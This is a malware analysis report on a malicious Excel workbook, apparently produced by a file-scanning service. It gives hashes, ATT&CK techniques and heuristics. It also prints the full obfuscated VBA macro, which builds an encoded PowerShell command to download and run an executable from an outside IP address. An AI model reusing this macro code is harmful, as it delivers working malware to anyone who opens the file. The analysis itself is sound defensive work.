Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d2e2fe7f617cd82c…

MALICIOUS

Office (OOXML)

22.6 KB Created: 2020-01-28 19:47:00 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-23
MD5: f661992f3ee0eb635f0fcc5696d3ed47 SHA-1: 94801bfe37020ece8fc00aa466ed23f9f78d4afe SHA-256: d2e2fe7f617cd82cf12f7ba980be09d6f956dca39797ef5eef7c7b91eff938e7
160 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Excel document containing VBA macros that use obfuscation to hide a PowerShell command. The document body contains a lure to enable macros, and the VBA script constructs and executes a PowerShell command. This command downloads a file from 'http://3.92.10.208/off/offica.exe' and executes it, likely as a second-stage payload. The script also saves this command to a batch file named 'Spaidhxz.bat' before execution.

Heuristics 4

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2298 bytes
SHA-256: 504d00e43a81ececa98102039f82f07c99c031239de62b792a4a0cdc7dc80d46
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Workbook_Activate()
On Error Resume Next

Dim bat As String


Dim s As String

s = s + "start "
Dim a As String
s = s + "/MI" + "N C:\Wi" + "ndo"
Dim dfdf As String
s = s + "ws\Sys" + "tem32\" + "Wind" + "owsPo" + "wer"
Dim fwefewf As String
s = s + "She" + "ll\v1.0" + "\pow" + "ersh" + "ell." + "exe"
Dim ewfwef As String
s = s + " -win " + "1 -e" + "nc "


s = s + "JABQAHIAbwBjAE4"
s = s + "AYQBtAGUAIAA9AC"
s = s + "AAIgBaAGcAbwBoA"
s = s + "HIAcwB5AHEAbwB6"
s = s + "AC4AZQB4AGUAIgA"
s = s + "7ACgATgBlAHcALQ"
s = s + "BPAGIAagBlAGMAd"
s = s + "AAgAFMAeQBzAHQA"
s = s + "ZQBtAC4ATgBlAHQ"
s = s + "ALgBXAGUAYgBDAG"
s = s + "wAaQBlAG4AdAApA"
s = s + "C4ARABvAHcAbgBs"
s = s + "AG8AYQBkAEYAaQB"
s = s + "sAGUAKAAiAGgAdA"
s = s + "B0AHAAOgAvAC8AM"
s = s + "QAzAC4AOQAyAC4A"
s = s + "MQAwADAALgAyADA"
s = s + "AOAAvAG8AZgBmAC"
s = s + "8AbwBmAGYAaQBjA"
s = s + "GUALgBlAHgAZQAi"
s = s + "ACwAIgAkAGUAbgB"
s = s + "2ADoAQQBQAFAARA"
s = s + "BBAFQAQQBcACQAU"
s = s + "AByAG8AYwBOAGEA"
s = s + "bQBlACIAKQA7AFM"
s = s + "AdABhAHIAdAAtAF"
s = s + "AAcgBvAGMAZQBzA"
s = s + "HMAIAAoACIAJABl"
s = s + "AG4AdgA6AEEAUAB"
s = s + "QAEQAQQBUAEEAXA"
s = s + "AkAFAAcgBvAGMAT"
s = s + "gBhAG0AZQAiACkA"


Dim x As Double

ActiveWorkbook.Save

bat = "Spaidhxz.bat"

Open bat For Output As #1
    Print #1, s 
    Close #1
    x = Shell(bat, 0)

End Sub


Attribute VB_Name = "Start"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes
SHA-256: f9bf23fd4935e2ad5ac33d8d7de7309f6b524a9161f170d2845a750c61e8c886

Open this report in the interactive analyzer, or submit your own file for analysis.